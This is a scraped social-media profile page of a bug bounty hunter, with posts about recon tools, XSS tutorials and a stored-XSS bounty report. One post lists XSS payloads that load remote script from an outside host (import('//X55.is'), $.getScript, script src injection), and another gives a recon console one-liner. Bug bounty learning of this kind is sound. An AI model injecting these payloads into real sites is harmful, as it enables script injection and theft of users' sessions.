Vipin Panchal
@dirtycoder0124
A positive, never give up person. Founder of https://blindf.com Telegram group https://t.me/+xa7Q6GcEudFkYzA1
Talvez você curta
Paste the data, and it will extract the domains. Not perfect, but useful for me. #bugbountytips #BugBounty dirtycoder0124.github.io/domain-extract…
Just got a reward for a high vulnerability submitted on @yeswehack -- (XSS) - Stored (CWE-79). yeswehack.com/hunters/dirty0… #YesWeRHackers Steps: 1. Found misconfigured Algolia key 2. Escalate it into Stored XSS 3. Payload executed when searching for a specific keyword #bugbountytips
Bug Bounty Search Engine Google advanced search queries generator for target domain: File & Directory Discovery Vulnerabilities & Exploits Subdomain & Asset Discovery And lot more github.com/gatiella/Bug-B… #InfoSec #BugBounty #bugbountytips #CyberSecurity
Stop missing cache poisoning vulnerabilities. Most hunters only test X-Forwarded-Host and miss 90% of the attack surface. I wrote a complete guide to finding what others miss: medium.com/@Aacle/the-cac… #bugbounty #infosec
LLM-powered subdomain enumeration tool.⚔️ - github.com/samogod/samosc… #infosec #cybersec #bugbountytips
Everyone hunts for common bugs… but the real rewards often hide in the underrated ones. I’ve made a YouTube playlist — “Underrated Vulnerabilities” showing how to find impactful bugs most hackers miss. Practical. Real. Eye-opening. Watch here: youtube.com/watch?v=GZ5yaQ…
Want to learn XSS from scratch and turn it into real, practical skills? I made a 23-video YouTube playlist that takes you from basic payloads to advanced XSS chains — with live target demos. Completely FREE. Watch the playlist youtube.com/watch?v=1WFEVp…
Best Alternatives to alert(1) #XSS Payload 1. import('//X55.is') x55.is/brutelogic/xss… 2. $.getScript('//X55.is') * x55.is/brutelogic/xss… 3. appendChild(createElement`script`).src='//X55.is' x55.is/brutelogic/xss… * requires jQuery loaded on DOM #hack2learn
Check this out! It's a solid one, though, that I often use while hunting :) github.com/TheArqsz/JSRec…
Use NextJS? Recon ✨ A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); Cred = linkedin.com/in/0xsojalsec?… #infosec #cybersec #bugbountytips
🔍 Unlock the secrets of the web with "The Art of Web Reconnaissance: Bug Bounty & Ethical Hacking"! 🌐💻 📌 What you'll learn: - Advanced web reconnaissance techniques - Identifying and exploiting vulnerabilities - Best practices for ethical hacking - Real-world bug bounty…
Now you can search keywords/secrets in both HTML+JS files. Also, it shows all URLs with parameters on the page. Already found some open redirects using this extension. #bugbountytips #bugbounty github.com/dirtycoder0124…
![hunter0x7's profile picture. [Hacker + lover of bash] I Don't know how to hack but i know how to pwnd!](https://pbs.twimg.com/profile_images/1176789748322643968/bEReriMR.jpg)
United States Tendências
- 1. Bama 29.2K posts
- 2. Ty Simpson 4,883 posts
- 3. Georgia 51.5K posts
- 4. Ryan Williams 2,136 posts
- 5. #SECChampionship 3,593 posts
- 6. Miami 202K posts
- 7. Texas Tech 29.9K posts
- 8. Messi 291K posts
- 9. Dawgs 11.1K posts
- 10. #UFC323 15.4K posts
- 11. DeBoer 2,839 posts
- 12. Kirby 13.8K posts
- 13. #RollTide 2,563 posts
- 14. Grubb 1,756 posts
- 15. Harry Ford 2,287 posts
- 16. Slot 144K posts
- 17. Mariners 4,432 posts
- 18. Ferrer 4,290 posts
- 19. MLS Cup 94.7K posts
- 20. Germie Bernard N/A
Talvez você curta
-
mohammed eldeeb
@malcolmx0x -
Geekboy
@emgeekboy -
Prateek Tiwari
@prateek_0490 -
KNOXSS
@KN0X55 -
Jasmin Landry
@JR0ch17 -
Japz (h4nt3rx) 🕷️🏴☠️
@japzdivino -
Wh11teW0lf
@Wh11teW0lf -
Pratik Yadav
@pratikyadav7_ -
Rahul Maini
@iamnoooob -
streaak
@streaak -
pwnmachine 👾
@princechaddha -
Jenish Sojitra
@_jensec -
Khizer Javed
@KHIZER_JAVED47 -
Rodolfo Assis
@RodoAssis -
Saad Ahmed
@XSaadAhmedX
Something went wrong.
Something went wrong.